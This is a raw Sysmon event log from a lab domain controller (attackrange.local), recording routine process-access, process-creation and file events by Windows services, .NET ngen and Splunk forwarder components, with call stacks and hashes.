21:03:57.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1BD-60D3-8203-00000000CF01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1BD-60D3-8203-00000000CF01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.993{4DB9351A-A1BD-60D3-8203-00000000CF01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000020455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.852{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BD-60D3-8103-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.836{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BD-60D3-8103-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.836{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BD-60D3-8103-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.742{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BD-60D3-8003-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.727{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BD-60D3-8003-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.727{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BD-60D3-8003-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:57.695{4DB9351A-A1BD-60D3-7E03-00000000CF01}4412C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\113c-0\Microsoft.Management.Infrastructure.dll2021-06-23 21:03:57.695 23542300x800000000000000020448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.571{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7ACB79F80420E715207BF83B719A9E4,SHA256=9CCE1BF1FEBE4D03766FF63628A877612B263CAE3E45D75E449DC034ADB4CBDA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.242{4DB9351A-A1BD-60D3-7F03-00000000CF01}10406920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.211{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EB6CB01002033BE232A86288DA2BEC1,SHA256=D164412D73DD208F9BDED997DBEAFDB600D3C6AF108289807725E9D7DA80F296,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.149{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BD-60D3-7E03-00000000CF01}4412C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.070{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1BD-60D3-7F03-00000000CF01}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.070{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BD-60D3-7F03-00000000CF01}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.070{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.070{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1BD-60D3-7F03-00000000CF01}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.073{4DB9351A-A1BD-60D3-7F03-00000000CF01}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000020436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.039{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1BD-60D3-7E03-00000000CF01}4412C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.039{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BD-60D3-7E03-00000000CF01}4412C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 